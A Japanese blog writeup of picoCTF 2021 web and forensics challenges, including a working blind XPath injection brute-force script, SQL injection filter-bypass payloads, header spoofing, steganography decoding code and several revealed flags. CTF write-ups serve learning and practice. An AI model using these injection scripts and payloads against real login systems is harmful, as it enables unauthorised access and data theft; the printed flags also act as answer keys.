picoCTF 2021 に @Satoooon1024さんと @miso_2324さんと一緒にPui-Pui-CTFerとして参加して、世界: 11位、日本: 1位 でした。

どのように解いたか書いてみます。

URLからポート番号消してるので、注意

Web

Who are you?

1
2
3
4
5

Author: madStacks

#### Description

Let me in. Let me iiiiiiinnnnnnnnnnnnnnnnnnnn

1
2

Hints:
It ain't much, but it's an RFC https://tools.ietf.org/html/rfc2616

これはとても記憶に残ってるのでwriteupとして残しておきます。

ヘッダに次々追加していけば次のステップへといけるんですが、Swedenからアクセスしろという司令だけ何をしても通りません。👇地獄の総当りw

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

Host: mercury.picoctf.net:1270 Sweden sv sv-SE
Referer: http://mercury.picoctf.net
Date: 2018
User-Agent: PicoBrowser Sweden sv sv-SE
DNT: 1
Location: Sweden sv sv-SE
Accept: Sweden sv sv-SE
Accept-Language: Sweden sv sv-SE
Accept-Ranges: Sweden sv sv-SE
Content-Language: Sweden sv sv-SE
Content-Location: Sweden sv sv-SE
Via: Sweden sv sv-SE
Vary: Sweden sv sv-SE
Country: Sweden sv sv-SE
Country-Code: Sweden sv sv-SE
Authorization: Sweden sv sv-SE
Age: Sweden sv sv-SE
Cache-Control: Sweden sv sv-SE
Expires: Sweden sv sv-SE
Pragma: Sweden sv sv-SE
Forwarded: Sweden sv sv-SE
X-Forwarded-For: Sweden sv sv-SE
X-Forwarded-Host: Sweden sv sv-SE
Location: Sweden sv sv-SE
Allow: Sweden sv sv-SE
Server: Sweden sv sv-SE
Range: Sweden sv sv-SE
Signature: Sweden sv sv-SE
X-DNS-Prefetch-Control: Sweden sv sv-SE
Live: Sweden sv sv-SE
From: Sweden sv sv-SE
Love: Sweden sv sv-SE
Accept-Charset: x-IA5-Swedish
Warning: 199 Sweden "Sweden"
X-Appengine-Country: SE Sweden

azureのVMでノルウェーからアクセスしたり、変なopenvpnでSwedenからアクセスしたりしましたが無理でした。 色々試していると(色々って1週間だぜ、ヤバイだろ)Sweden.seのIP addressをX-Forwarded-Fprに入れたら通りました。

まとめ

1
2
3
4
5
6
7

Host: mercury.picoctf.net:1270
Referer: http://mercury.picoctf.net
Date: 2018
User-Agent: PicoBrowser
DNT: 1
X-Forwarded-For: 139.162.171.198
Accept-Language: sv

X marks the spot

1
2
3
4
5

Author: madStacks

#### Description

Another login you have to bypass. Maybe you can find an injection that works? [http://mercury.picoctf.net](http://mercury.picoctf.net)

1
2

Hints:
XPATH

username, passwordの欄のどちらも'に反応します。

cookieがPHPSESSID=07vik3l3efg925bifu0j36pa5f なのが気になる

ヒントがXPATHなので、xpath injectionっぽいなと思い、調べます。 https://book.hacktricks.xyz/pentesting-web/xpath-injectionhttps://owasp.org/www-community/attacks/XPATH_Injection をガアガア見て考えます。

x' or 1=1 or 'x'='y, admin' or ', guest' or ' でサイト上部にyou're the right pathが表示されます。 あとは頑張って調べたことをまとめます。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34

import requests, string

alphabet = string.ascii_letters + string.digits + "{}_()!./"

def number_of_nodes():
    for i in range(30):
        exploit = """' or count(//user/child::node())={} or ''='""".format(i)
        r = requests.post("http://mercury.picoctf.net", data={'name': exploit, 'pass': ''})
        if ("right path" in r.text):
            return i

def string_length(user, child):
    for i in range(100):
        exploit = """' or string-length(//user[position()={0}]/child::node()[position()={1}])={2} or ''='""".format(user, child, i)
        r = requests.post("http://mercury.picoctf.net", data={'name': exploit, 'pass': ''})
        if ("right path" in r.text):
            return i

def search(user, child, l):
    flag = ""
    for num in range(1, l+1):
        for al in alphabet:
            exploit = """' or substring((//user[position()={0}]/child::node()[position()={1}]),{2},1)="{3}" or ''='""".format(user, child, num, al)
            r = requests.post("http://mercury.picoctf.net", data={'name': exploit, 'pass': ''})
            if ("right path" in r.text):
                flag += al
                break
    return flag

nodes = number_of_nodes()
for user in range(1, 11):
    for child in range(1, nodes+1):
        l = string_length(user, child)
        print("user:", user, "child:", child, "len:", l, "flag:", search(user, child, l))

Forensic

悪名高きforensic。今回も名前に負けない問題が多くてとても手強かったです。

information

1
2
3
4
5

Author: susie

#### Description

Files can always be changed in a secret way. Can you find the flag? [cat.jpg](https://mercury.picoctf.net/static/b4d62f6e431dc8e563309ea8c33a06b3/cat.jpg)

1
2
3

Hints:
Look at the details of the file
Make sure to submit the flag as picoCTF{XXXXX}

catとかstringsとかしても出なくてあれれとおもいながらexiftoolで出ました。

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29

ExifTool Version Number         : 12.05
File Name                       : cat.jpg
Directory                       : .
File Size                       : 858 kB
File Modification Date/Time     : 2021:03:16 03:24:46+09:00
File Access Date/Time           : 2021:04:02 23:11:56+09:00
File Inode Change Date/Time     : 2021:04:01 05:40:51+09:00
File Permissions                : rw-rw-r--
File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.02
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Current IPTC Digest             : 7a78f3d9cfb1ce42ab5a3aa30573d617
Copyright Notice                : PicoCTF
Application Record Version      : 4
XMP Toolkit                     : Image::ExifTool 10.80
License                         : cGljb0NURnt0aGVfbTN0YWRhdGFfMXNfbW9kaWZpZWR9
Rights                          : PicoCTF
Image Width                     : 2560
Image Height                    : 1598
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
Image Size                      : 2560x1598
Megapixels                      : 4.1

たぶんLicenseがflagだと思います。

Matryoshka doll

1
2
3
4
5

Author: Susie/Pandu

#### Description

Matryoshka dolls are a set of wooden dolls of decreasing size placed one inside another. What's the final one? Image: [this](https://mercury.picoctf.net/static/5ef2e9103d55972d975437f68175b9ab/dolls.jpg)

1
2
3

Hints:
Wait, you can hide files inside files? But how do you find them?
Make sure to submit the flag as picoCTF{XXXXX}

foremostしてたらflagがでました。

MacroHard WeakEdge

1
2
3
4
5

Author: madStacks

#### Description

I've hidden a flag in this file. Can you find it? [Forensics is fun.pptm](https://mercury.picoctf.net/static/c0da20f29337e87ffb58ea987d8c596e/Forensics is fun.pptm)

1
2

Hints:
(None)

DEFCONのyoutubeに動画があり、そこでoletoolsっていうのを使っていたのでまねしたらflagが出ました。

Trivial Flag Transfer Protocol

1
2
3
4
5

Author: Danny

#### Description

Figure out how they moved the [flag](https://mercury.picoctf.net/static/4fe0f4357f7458c6892af394426eab55/tftp.pcapng).

1
2

Hints:
What are some other ways to hide data?

file export tftpして、bmp3個とテキストファイル2個とprogram.debが与えられます。

debにsteghideがあるので、何かパスワードが有るのかもしれないと思い、 1つ目のbmpに対してsteghideを使いました。パスフレーズも色々試しましたが全部だめでした。

planに書いてあるI USED THE PROGRAM AND HID IT WITH DUE DILIGENCE. CHECK OUT THE PHOTOSのDue DiligenceはDDと省略できるのでbinwalkで色々みつかるpicture2に隠れているのではないかと思い色々してもだめでした。

結局、picture1, picture2は囮で、picture3が本命、DUEDILIGENCEがpassphraseでした。うーーん

Disk, disk, sleuth!

1
2
3
4
5

Author: syreal

#### Description

Use \`srch\_strings\` from the sleuthkit and some terminal-fu to find a flag in this disk image: [dds1-alpine.flag.img.gz](https://mercury.picoctf.net/static/f63e4eba644c99e92324b65cbd875db6/dds1-alpine.flag.img.gz)

1
2
3
4
5

Hints:
Have you ever used \`file\` to determine what a file was?
Relevant terminal-fu in picoGym: https://play.picoctf.org/practice/challenge/85
Mastering this terminal-fu would enable you to find the flag in a single command: https://play.picoctf.org/practice/challenge/48
Using your own computer, you could use qemu to boot from this disk!

stringsで答えが出ます。

Milkslap

1
2
3
4
5

Author: James Lynch

#### Description

[🥛](http://mercury.picoctf.net)

1
2

Hints:
Look at the problem category

zstegで答えが出ます。

Disk, disk, sleuth! II

1
2
3
4
5

Author: syreal

#### Description

All we know is the file with the flag is named `down-at-the-bottom.txt`... Disk image: [dds2-alpine.flag.img.gz](https://mercury.picoctf.net/static/544be9762e9f9c0adcbeb7bcf27f49a2/dds2-alpine.flag.img.gz)

1
2
3
4

Hints:
The sleuthkit has some great tools for this challenge as well.
Sleuthkit docs here are so helpful: [TSK Tool Overview](http://wiki.sleuthkit.org/index.php?title=TSK_Tool_Overview)
This disk can also be booted with qemu!

stringsでは答えが出ませんでした。悲しいね。

autopsyでdown-at-the-bottom.txtを見るとflagがありました。

Surfing the Waves

1
2
3
4
5

Author: William Batista

#### Description

While you're going through the FBI's servers, you stumble across their incredible taste in music. One [main.wav](https://mercury.picoctf.net/static/2a75da7f60d50bbaca9f9d3f1dec85ae/main.wav) you found is particularly interesting, see if you can find the flag!

1
2
3

Hints:
Music is cool, but what other kinds of waves are there?
Look deep below the surface

これも解くのに1週間かかりました💢。 これは開催中にチームで共有していたメモに結構詳しく書いているのでそのまま貼っときます。

問題文のLook deep below the surfaceは何? fftした後の斜め線を消せばどうにかなるのかと思ったがそうでもなかった。 audacityでスペクトログラム表示して見ても特に… ノイズを消しすぎるとピーという一つの音になる

fftすると明らかに怪しいので間違って無いはず

fft

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

import sys
import scipy.io.wavfile
import numpy as np
import matplotlib.pyplot as plt


wav_filename = "./flag.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

data = data / 32768

fft_data = np.abs(np.fft.fft(data))
freqList = np.fft.fftfreq(data.shape[0], d=1.0/rate)
plt.plot(freqList, fft_data)
plt.xlim(0, 1500)
plt.show()

fftして出てきた斜め線を消す(below the surfaceのつもり)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

import sys
import numpy as np
import scipy as sp
from scipy.fftpack import fft
import wave
N = 1024
def editsound(databuf):
    databuf1 = np.zeros(databuf.size)
    for i in range(int(databuf.size / N)):
        yf = sp.fftpack.fft(databuf[N * i: N * (i+1)])
        yf[abs(yf) > 700000] = 0

        databuf1[N * i: N * (i+1)] = sp.fftpack.ifft(yf).real
    return databuf1

wavefile = wave.open('main.wav',"rb")
buf = wavefile.readframes(wavefile.getnframes())
buf = np.frombuffer(buf, dtype= "int16")
wavefile.close()
print(wavefile.getparams())
sounddata = buf.copy() #サウンドデータ用バッファ
sounddata[0::2] = editsound(sounddata[0::2])
sounddata[1::2] = editsound(sounddata[1::2])
writewave = wave.Wave_write("flag.wav")
writewave.setparams(wavefile.getparams())
writewave.writeframes(sounddata)
writewave.close()
sys.exit()

実は斜め線を消した写真の下にも斜め線があって……

違う気しかしない

でも、問題文の内容には当てハマってるきがするんだよね

公式のdiscordを眺めているとaudacityでいけると言われてる

ほうほう(本当か?)

真ん中より上にしか波無いのは異常?

同じ波形がいくつも並んでる(気がする)

っぽいwriteup

https://ctftime.org/writeup/11405

https://ctftime.org/writeup/21167

ダイヤルアップみたい!?

確かにこれの最後の方とすごく似ている

https://www.youtube.com/watch?v=WflkFUY9pHI

1
2
3
4
5

import scipy.io.wavfile
wav_filename = "./main.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

print(set(data), len(set(data)))

1

{8500, 8501, 8502, 8503, 8504, 8505, 8506, 8507, 8508, 8509, 8000, 8001, 8002, 8003, 8004, 8005, 8006, 8007, 8008, 8009, 7500, 7501, 7502, 7503, 7504, 7505, 7506, 7507, 7508, 7509, 7000, 7001, 7002, 7003, 7004, 7005, 7006, 7007, 7008, 7009, 6500, 6501, 6502, 6503, 6507, 6508, 6509, 6000, 6001, 6002, 6003, 6004, 6005, 6006, 6007, 6008, 6009, 5500, 5501, 5502, 5503, 5504, 5505, 5506, 5507, 5508, 5509, 5000, 5001, 5002, 5003, 5004, 5005, 5006, 5007, 5008, 5009, 4500, 4501, 4502, 4503, 4504, 4505, 4506, 4507, 4508, 4509, 4000, 4001, 4002, 4003, 4004, 4005, 4006, 4007, 4008, 4009, 3500, 3501, 3502, 3503, 3504, 3505, 3506, 3507, 3508, 3509, 3000, 3001, 3002, 3003, 3004, 3005, 3006, 3007, 3008, 3009, 2500, 2501, 2502, 2503, 2504, 2505, 2506, 2507, 2508, 2509, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 1500, 1501, 1502, 1503, 1504, 1505, 1506, 1507, 1508, 1509, 1000, 1001, 1002, 1003, 1004, 1005, 1006, 1007, 1008, 1009} 157

値が500n+9ずつに分散している。 –> 以下に頻度を示す(2つとも書き方が違うだけで同じ)

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

[1000 1001 1002 1003 1004 1005 1006 1007 1008 1009 1500 1501 1502 1503
 1504 1505 1506 1507 1508 1509 2000 2001 2002 2003 2004 2005 2006 2007
 2008 2009 2500 2501 2502 2503 2504 2505 2506 2507 2508 2509 3000 3001
 3002 3003 3004 3005 3006 3007 3008 3009 3500 3501 3502 3503 3504 3505
 3506 3507 3508 3509 4000 4001 4002 4003 4004 4005 4006 4007 4008 4009
 4500 4501 4502 4503 4504 4505 4506 4507 4508 4509 5000 5001 5002 5003
 5004 5005 5006 5007 5008 5009 5500 5501 5502 5503 5504 5505 5506 5507
 5508 5509 6000 6001 6002 6003 6004 6005 6006 6007 6008 6009 6500 6501
 6502 6503 6507 6508 6509 7000 7001 7002 7003 7004 7005 7006 7007 7008
 7009 7500 7501 7502 7503 7504 7505 7506 7507 7508 7509 8000 8001 8002
 8003 8004 8005 8006 8007 8008 8009 8500 8501 8502 8503 8504 8505 8506
 8507 8508 8509]
[26 32 28 23 29 28 32 25 27 24  4  3 13 12  6 12 13  2  8 10 38 35 41 36
 38 32 22 33 39 34 22 15 12 15 16 15 18 26 14 18 10  5 11 12 10  8  8 11
 15 15 14 22 20 23 21 26 22 15 20 24 68 58 52 61 72 60 78 69 66 67 26 47
 29 39 36 16 37 35 43 29 13 10  4  8 13  8 13 11  5  8  9 17 12  8  7  8
 19 19 20 16  3  7 13  6  3  7  9  6  2  5  5  2  1  3  2  4  2  4  4  2
  4  2  2  3  1  4  6  7  7  6  6 11  3  9 10  4  7  6  6  9  8  8  6 10
  7  5 10 10  2  5  8  8  9  6 16  4  7]

1

1000:26, 1001:32, 1002:28, 1003:23, 1004:29, 1005:28, 1006:32, 1007:25, 1008:27, 1009:24, 1500:4, 1501:3, 1502:13, 1503:12, 1504:6, 1505:12, 1506:13, 1507:2, 1508:8, 1509:10, 2000:38, 2001:35, 2002:41, 2003:36, 2004:38, 2005:32, 2006:22, 2007:33, 2008:39, 2009:34, 2500:22, 2501:15, 2502:12, 2503:15, 2504:16, 2505:15, 2506:18, 2507:26, 2508:14, 2509:18, 3000:10, 3001:5, 3002:11, 3003:12, 3004:10, 3005:8, 3006:8, 3007:11, 3008:15, 3009:15, 3500:14, 3501:22, 3502:20, 3503:23, 3504:21, 3505:26, 3506:22, 3507:15, 3508:20, 3509:24, 4000:68, 4001:58, 4002:52, 4003:61, 4004:72, 4005:60, 4006:78, 4007:69, 4008:66, 4009:67, 4500:26, 4501:47, 4502:29, 4503:39, 4504:36, 4505:16, 4506:37, 4507:35, 4508:43, 4509:29, 5000:13, 5001:10, 5002:4, 5003:8, 5004:13, 5005:8, 5006:13, 5007:11, 5008:5, 5009:8, 5500:9, 5501:17, 5502:12, 5503:8, 5504:7, 5505:8, 5506:19, 5507:19, 5508:20, 5509:16, 6000:3, 6001:7, 6002:13, 6003:6, 6004:3, 6005:7, 6006:9, 6007:6, 6008:2, 6009:5, 6500:5, 6501:2, 6502:1, 6503:3, 6507:2, 6508:4, 6509:2, 7000:4, 7001:4, 7002:2, 7003:4, 7004:2, 7005:2, 7006:3, 7007:1, 7008:4, 7009:6, 7500:7, 7501:7, 7502:6, 7503:6, 7504:11, 7505:3, 7506:9, 7507:10, 7508:4, 7509:7, 8000:6, 8001:6, 8002:9, 8003:8, 8004:8, 8005:6, 8006:10, 8007:7, 8008:5, 8009:10, 8500:10, 8501:2, 8502:5, 8503:8, 8504:8, 8505:9, 8506:6, 8507:16, 8508:4, 8509:7

4000代が異常に多い

このwriteupが参考にな るかも? った。discord見て、似たような問題のwriteupが有ると言われなかったら解けなかった。 https://ctftime.org/writeup/21370 wavのdataを2つずつ見ると、(前, 後, 前, 後, …と並んでるとする)

1

1000:8, 1001:8, 1002:9, 1003:7, 1004:8, 1005:6, 1006:10, 1007:7, 1008:5, 1009:9, 2000:29, 2001:25, 2002:32, 2003:30, 2004:34, 2005:20, 2006:17, 2007:28, 2008:32, 2009:23, 2500:10, 2501:6, 2502:9, 2503:7, 2504:7, 2505:5, 2506:11, 2507:15, 2508:5, 2509:6, 3000:2, 3001:1, 3002:1, 3003:1, 3008:1, 3009:1, 3500:3, 3501:5, 3502:6, 3503:8, 3504:6, 3505:9, 3506:4, 3507:4, 3508:9, 3509:9, 4000:57, 4001:54, 4002:47, 4003:57, 4004:63, 4005:49, 4006:68, 4007:61, 4008:55, 4009:63, 4500:24, 4501:43, 4502:24, 4503:34, 4504:28, 4505:12, 4506:36, 4507:31, 4508:37, 4509:27

1

1000:18, 1001:24, 1002:19, 1003:16, 1004:21, 1005:22, 1006:22, 1007:18, 1008:22, 1009:15, 1500:4, 1501:3, 1502:13, 1503:12, 1504:6, 1505:12, 1506:13, 1507:2, 1508:8, 1509:10, 2000:9, 2001:10, 2002:9, 2003:6, 2004:4, 2005:12, 2006:5, 2007:5, 2008:7, 2009:11, 2500:12, 2501:9, 2502:3, 2503:8, 2504:9, 2505:10, 2506:7, 2507:11, 2508:9, 2509:12, 3000:8, 3001:4, 3002:10, 3003:11, 3004:10, 3005:8, 3006:8, 3007:11, 3008:14, 3009:14, 3500:11, 3501:17, 3502:14, 3503:15, 3504:15, 3505:17, 3506:18, 3507:11, 3508:11, 3509:15, 4000:11, 4001:4, 4002:5, 4003:4, 4004:9, 4005:11, 4006:10, 4007:8, 4008:11, 4009:4, 4500:2, 4501:4, 4502:5, 4503:5, 4504:8, 4505:4, 4506:1, 4507:4, 4508:6, 4509:2, 5000:13, 5001:10, 5002:4, 5003:8, 5004:13, 5005:8, 5006:13, 5007:11, 5008:5, 5009:8, 5500:9, 5501:17, 5502:12, 5503:8, 5504:7, 5505:8, 5506:19, 5507:19, 5508:20, 5509:16, 6000:3, 6001:7, 6002:13, 6003:6, 6004:3, 6005:7, 6006:9, 6007:6, 6008:2, 6009:5, 6500:5, 6501:2, 6502:1, 6503:3, 6507:2, 6508:4, 6509:2, 7000:4, 7001:4, 7002:2, 7003:4, 7004:2, 7005:2, 7006:3, 7007:1, 7008:4, 7009:6, 7500:7, 7501:7, 7502:6, 7503:6, 7504:11, 7505:3, 7506:9, 7507:10, 7508:4, 7509:7, 8000:6, 8001:6, 8002:9, 8003:8, 8004:8, 8005:6, 8006:10, 8007:7, 8008:5, 8009:10, 8500:10, 8501:2, 8502:5, 8503:8, 8504:8, 8505:9, 8506:6, 8507:16, 8508:4, 8509:7

でも1のくらいが変化するのに丸めたらダメか…? what other kinds of waves are there?

答えでた

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14

import numpy as np
import scipy.io.wavfile
from Crypto.Util.number import long_to_bytes


wav_filename = "./main.wav"
rate, data = scipy.io.wavfile.read(wav_filename)

with open("flag", "wb") as f:
    for i in range(0, len(data), 2):
        c = bytearray([int((data[i]-1000)/500)*16 + int((data[i+1]-1000)/500)])
        if i < 50:
            print(c)
        f.write(c)

出力

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40

#!/usr/bin/env python3
import numpy as np
from scipy.io.wavfile import write
from binascii import hexlify
from random import random
with open('generate_wav.py', 'rb') as f:
	content = f.read()
	f.close()
# Convert this program into an array of hex values
hex_stuff = (list(hexlify(content).decode("utf-8")))
# Loop through the each character, and convert the hex a-f characters to 10-15
for i in range(len(hex_stuff)):
	if hex_stuff[i] == 'a':
		hex_stuff[i] = 10
	elif hex_stuff[i] == 'b':
		hex_stuff[i] = 11
	elif hex_stuff[i] == 'c':
		hex_stuff[i] = 12
	elif hex_stuff[i] == 'd':
		hex_stuff[i] = 13
	elif hex_stuff[i] == 'e':
		hex_stuff[i] = 14
	elif hex_stuff[i] == 'f':
		hex_stuff[i] = 15
	# To make the program actually audible, 100 hertz is added from the beginning, then the number is multiplied by
	# 500 hertz
	# Plus a cheeky random amount of noise
	hex_stuff[i] = 1000 + int(hex_stuff[i]) * 500 + (10 * random())
def sound_generation(name, rand_hex):
	# The hex array is converted to a 16 bit integer array
	scaled = np.int16(np.array(hex_stuff))
	# Sci Pi then writes the numpy array into a wav file
	write(name, len(hex_stuff), scaled)
	randomness = rand_hex
# Pump up the music!
# print("Generating main.wav...")
# sound_generation('main.wav')
# print("Generation complete!")
# Your ears have been blessed
# picoCTF{mU21C_1s_1337_6a936af2}

途中までdiscord見ずに解いてたので それが普通では? 迷走していました。

その他

競技中にforensicが嫌になって違う分野を少し解いてました(チームメイトが既に解いてるので点数の加算は無し)。pwnとrevは落ち着いて解きたいのでwebとcryptoをしてました。

そのなかで解法が複数ありそうなwebの問題があったので一応自分の解き方を書いておきます。

(4/8追記)他の人のwriteupを見ていると解き方が違うけど、チームメイトとは一緒で面白いな

Web

Web Gauntlet 2

1
2
3
4
5

Author: madStacks

#### Description

This website looks familiar... Log in as admin Site: [http://mercury.picoctf.net/](http://mercury.picoctf.net/) Filter: [http://mercury.picoctf.net/filter.php](http://mercury.picoctf.net/filter.php)

1
2
3
4
5
6

Hints:
I tried to make it a little bit less contrived since the mini competition.
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
There is a length component now.
sqlite

'を入れるとバグります。 SELECT unsername, password FROM users WHERE username=''' AND password='a'Filters: or and true false union like = > < ; -- /\* \*/ adminらしいです。

これを見ると https://github.com/w181496/Web-CTF-Cheatsheet substrでどうにかなりそうです。

name: '||substr(, pass: 'admi',-4)||'n

Web Gauntlet 3

1
2
3
4
5

Author: madStacks

#### Description

Last time, I promise! Only 25 characters this time. Log in as admin Site: [http://mercury.picoctf.net/](http://mercury.picoctf.net/) Filter: [http://mercury.picoctf.net/filter.php](http://mercury.picoctf.net/filter.php)

1
2
3
4

Hints:
Each filter is separated by a space. Spaces are not filtered.
There is only 1 round this time, when you beat it the flag will be in filter.php.
sqlite

Web Gauntlet 2と全く同じので通りました?何がしたかったんだ???

感想

picoCTFは部活で2回参加していて始まる前からクソ問がとても多いと知っていました。

あまりクソ問を解きたいとは思わないのですが、解くのにすごく時間がかかるので(そりゃ総当りなんだから)、最初にmiscやforensicに取り掛かりました。

初日、朝早くからチームメイトは頑張ってるなと思いながらgeneral skillを解きました。 酷いguessもなくforensicに移り残りの時間全てをforensicに捧げました。ついでにSwedenもやりました。

forensicしか解いてないとやった感が出ないので、チームメイトが解いているのを見ていて面白そうだなと思った問題を解いていきたいな。